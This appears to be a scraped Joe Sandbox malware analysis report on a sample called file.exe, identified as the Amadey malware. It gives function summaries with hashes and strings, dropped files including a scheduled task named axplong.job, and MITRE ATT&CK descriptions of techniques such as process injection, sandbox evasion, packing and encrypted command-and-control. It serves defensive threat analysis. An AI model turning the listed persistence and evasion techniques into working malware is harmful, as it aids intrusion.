Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 1409afdc7fbd231194fcef3e568fffa0b068abab455a65fe93ef20b28ffb8ce5
Instruction ID: a1c40827c324da80c01c4204df1dae62921daa6294cb03c94686dea41fe95274
Opcode Fuzzy Hash: 1409afdc7fbd231194fcef3e568fffa0b068abab455a65fe93ef20b28ffb8ce5
Instruction Fuzzy Hash: 3CA102B0A003999FDB11DFA5C9497AAB7B8FF15310F008229E925D7241EB35EB04DB92

Function 00D170C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00D1710B

Strings

.com, xrefs: 00D1714B
.exe, xrefs: 00D17118
.bat, xrefs: 00D1713A
.cmd, xrefs: 00D17129

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: a666bf80d2275a28ffe5566f8a8eed6aa6f16cf87db7d0bb422f126cf0d728ec
Instruction ID: 978070b24d1871eb125728a403cfd2d5a60e50b119c571c4f120a49db7e0d0e1
Opcode Fuzzy Hash: a666bf80d2275a28ffe5566f8a8eed6aa6f16cf87db7d0bb422f126cf0d728ec
Instruction Fuzzy Hash: AC01DB37A487263656186419BC036BB17A8DB83BB4B1D002BFD48F73D1DE54DCC241B0

Function 00CE6EC0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00CE7065

Strings

, xrefs: 00CE7140
VUUU, xrefs: 00CE6F11
invalid stoi argument, xrefs: 00CE7060

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: $VUUU$invalid stoi argument
API String ID: 909987262-3954507777
Opcode ID: 0321c632bf89ff9c0b176ebba878084ec1515bbb45c3fba5e8ed61fb22fc7b08
Instruction ID: f3f4d00bfed66744de396f85155b0e40e4ee84dafed1cbd27467297bc2383c42
Opcode Fuzzy Hash: 0321c632bf89ff9c0b176ebba878084ec1515bbb45c3fba5e8ed61fb22fc7b08
Instruction Fuzzy Hash: 6351D371644344BFD724EB65DC06FABB7E9AF84B04F400529F744A72D0EBB0E9048BA6

Function 00D1C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D1CA37

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 78601c5351e3c5668625f2421168f94c63161dc327bf06864e7ab02dbd8d9556
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 5AB15932A64255AFDB11CF28E8417FEBBE6EF55340F1891AAD845DB341DA348D81CBB0

Function 00CFBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00CFBAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 00CFBB14
_xtime_get.LIBCPMT ref: 00CFBB37
__Xtime_diff_to_millis2.LIBCPMT ref: 00CFBB43

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 7431b898358c29410d63959076b04841afc7a85e253c37743cc408107bce1cad
Instruction ID: 4428e2348316cfe2f724ea0cae1cc930c0e88cbfef8e99ea0ae8e818ff6ced5f
Opcode Fuzzy Hash: 7431b898358c29410d63959076b04841afc7a85e253c37743cc408107bce1cad
Instruction Fuzzy Hash: 5A213175A0121D9FDF50EFA4DD819BEBBB8EF48714F100065FA01A7251DB30AE01ABA2

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
file.exe

Function 00CEBD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Function 00CE5C60 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 473
registryCOMMON

Function 00CE7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00D16E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 00D16C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Function 00CE82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00D16F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 00CF6AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Function 05440B24 Relevance: .1, Instructions: 91
COMMON